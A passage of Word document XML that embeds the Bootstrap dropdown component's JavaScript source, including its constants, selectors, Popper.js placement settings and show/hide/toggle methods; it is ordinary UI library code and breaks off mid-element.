        <w:t xml:space="preserve">  var ESCAPE_KEYCODE = 27; // KeyboardEvent.which value for Escape (Esc) key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var SPACE_KEYCODE = 32; // KeyboardEvent.which value for space key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var TAB_KEYCODE = 9; // KeyboardEvent.which value for tab key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ARROW_UP_KEYCODE = 38; // KeyboardEvent.which value for up arrow key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ARROW_DOWN_KEYCODE = 40; // KeyboardEvent.which value for down arrow key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var RIGHT_MOUSE_BUTTON_WHICH = 3; // MouseEvent.which value for the right button (assuming a right-handed mouse)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var REGEXP_KEYDOWN = new RegExp(ARROW_UP_KEYCODE + "|" + ARROW_DOWN_KEYCODE + "|" + ESCAPE_KEYCODE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Event$4 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK: "click" + EVENT_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$4 + DATA_API_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    KEYDOWN_DATA_API: "keydown" + EVENT_KEY$4 + DATA_API_KEY$4,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    KEYUP_DATA_API: "keyup" + EVENT_KEY$4 + DATA_API_KEY$4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ClassName$4 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DISABLED: 'disabled',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPUP: 'dropup',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPRIGHT: 'dropright',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPLEFT: 'dropleft',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MENURIGHT: 'dropdown-menu-right',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MENULEFT: 'dropdown-menu-left',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    POSITION_STATIC: 'position-static'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Selector$4 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE: '[data-toggle="dropdown"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FORM_CHILD: '.dropdown form',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MENU: '.dropdown-menu',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NAVBAR_NAV: '.navbar-nav',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    VISIBLE_ITEMS: '.dropdown-menu .dropdown-item:not(.disabled):not(:disabled)'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AttachmentMap = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOP: 'top-start',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOPEND: 'top-end',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BOTTOM: 'bottom-start',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BOTTOMEND: 'bottom-end',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    RIGHT: 'right-start',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    RIGHTEND: 'right-end',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LEFT: 'left-start',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LEFTEND: 'left-end'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Default$2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    flip: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    boundary: 'scrollParent',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    reference: 'toggle',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    display: 'dynamic'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DefaultType$2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    offset: '(number|string|function)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    flip: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    boundary: '(string|element)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    reference: '(string|element)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    display: 'string'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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var Dropdown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Dropdown(element, config) {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  this._popper = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._config = this._getConfig(config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._menu = this._getMenuElement();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._inNavbar = this._detectNavbar();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._addEventListeners();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Dropdown.prototype;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_proto.toggle = function toggle() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED))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parent = Dropdown._getParentFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isActive = $(this._menu).hasClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Dropdown._clearMenus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (isActive)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relatedTarget = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: this._element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var showEvent = $.Event(Event$4.SHOW, relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(parent).trigger(showEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (showEvent.isDefaultPrevented())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 // Disable totally Popper.js for Dropdown in Navbar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if (!this._inNavbar) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        /**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">         * Check for Popper dependency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">         * Popper - https://popper.js.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">         */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (typeof Popper === 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          throw new TypeError('Bootstrap\'s dropdowns require Popper.js (https://popper.js.org/)');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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referenceElement = this._element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this._config.reference === 'parent') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          referenceElement = parent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (Util.isElement(this._config.reference)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          referenceElement = this._config.reference; // Check if it's jQuery element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (typeof this._config.reference.jquery !== 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            referenceElement = this._config.reference[0];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 // If boundary is not `scrollParent`, then set position to `static`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // to allow the menu to "escape" the scroll parent's boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // https://github.com/twbs/bootstrap/issues/24251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  if (this._config.boundary !== 'scrollParent') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(parent).addClass(ClassName$4.POSITION_STATIC);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this._popper = new Popper(referenceElement, this._menu, this._getPopperConfig());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // If this is a touch-enabled device we add extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // empty mouseover listeners to the body's immediate children;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      // only needed because of broken event delegation on iOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html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if ('ontouchstart' in document.documentElement &amp;&amp; $(parent).closest(Selector$4.NAVBAR_NAV).length === 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(document.body).children().on('mouseover', null, $.noop);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this._element.focus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._element.setAttribute('aria-expanded', true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._menu).toggleClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.SHOWN, relatedTarget));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_proto.show = function show() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || $(this._menu).hasClass(ClassName$4.SHOW))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relatedTarget = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: this._element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var showEvent = $.Event(Event$4.SHOW, relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var parent = Dropdown._getParentFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(parent).trigger(showEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (showEvent.isDefaultPrevented())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$(this._menu).toggleClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.SHOWN, relatedTarget));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_proto.hide = function hide() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || !$(this._menu).hasClass(ClassName$4.SHOW))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relatedTarget = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: this._element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var hideEvent = $.Event(Event$4.HIDE, relatedTarget);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var parent = Dropdown._getParentFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      $(parent).trigger(hideEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (hideEvent.isDefaultPrevented())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$(this._menu).toggleClass(ClassName$4.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget));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$.removeData(this._element, DATA_KEY$4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(this._element).off(EVENT_KEY$4);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  this._menu = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._popper !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._popper.destroy();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._popper = null;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_proto.update = function update() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._inNavbar = this._detectNavbar();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this._popper !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._popper.scheduleUpdate();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_proto._addEventListeners = function _addEventListeners()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$(this._element).on(Event$4.CLICK, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        event.stopPropagation();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _this.toggle();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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      config = _objectSpread({}, this.constructor.Default, $(this._element).data(), config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Util.typeCheckConfig(NAME$4, config, this.constructor.DefaultType);</w:t>
      </w:r>
    </w:p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_proto._getMenuElement = function _getMenuElement() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (!this._menu) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var parent = Dropdown._getParentFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (parent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          this._menu = parent.querySelector(Selector$4.MENU);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this._menu;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_proto._getPlacement = function _getPlacement() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $parentDropdown = $(this._element.parentNode);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var placement = AttachmentMap.BOTTOM; // Handle dropup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ($parentDropdown.hasClass(ClassName$4.DROPUP)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        placement = AttachmentMap.TOP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
